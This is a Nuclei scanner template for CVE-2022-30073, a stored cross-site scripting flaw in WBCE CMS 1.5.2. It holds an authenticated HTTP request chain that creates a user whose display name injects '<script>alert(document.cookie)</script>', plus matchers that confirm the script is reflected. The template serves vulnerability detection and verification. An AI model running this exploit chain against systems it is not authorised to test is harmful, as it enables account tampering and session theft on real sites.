80 lines
2.8 KiB
YAML
80 lines
2.8 KiB
YAML
id: CVE-2022-30073
|
|
|
|
info:
|
|
name: WBCE CMS 1.5.2 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/APTX-4879/CVE
|
|
- https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-30073
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2022-30073
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00205
|
|
epss-percentile: 0.5842
|
|
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
vendor: wbce
|
|
product: wbce_cms
|
|
tags: cve2022,cve,wbcecms,xss,wbce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /admin/login/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
|
|
- |
|
|
GET /admin/users/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /admin/users/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
|
|
- |
|
|
GET /admin/users/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<p><b><script>alert(document.cookie)</script>"
|
|
- "WBCECMS"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: formtoken
|
|
group: 1
|
|
regex:
|
|
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
|
|
internal: true
|
|
part: body
|
|
# digest: 4b0a00483046022100b2a548c5526e06565ede6b31dec394968ae49e92e911f9c3b895a967aa6b9d710221008fca32c04e5b0118fad8d67392dd3458f800c555df646fd1ceb93919c796b35d:922c64590222798bb761d5b6d8e72950 |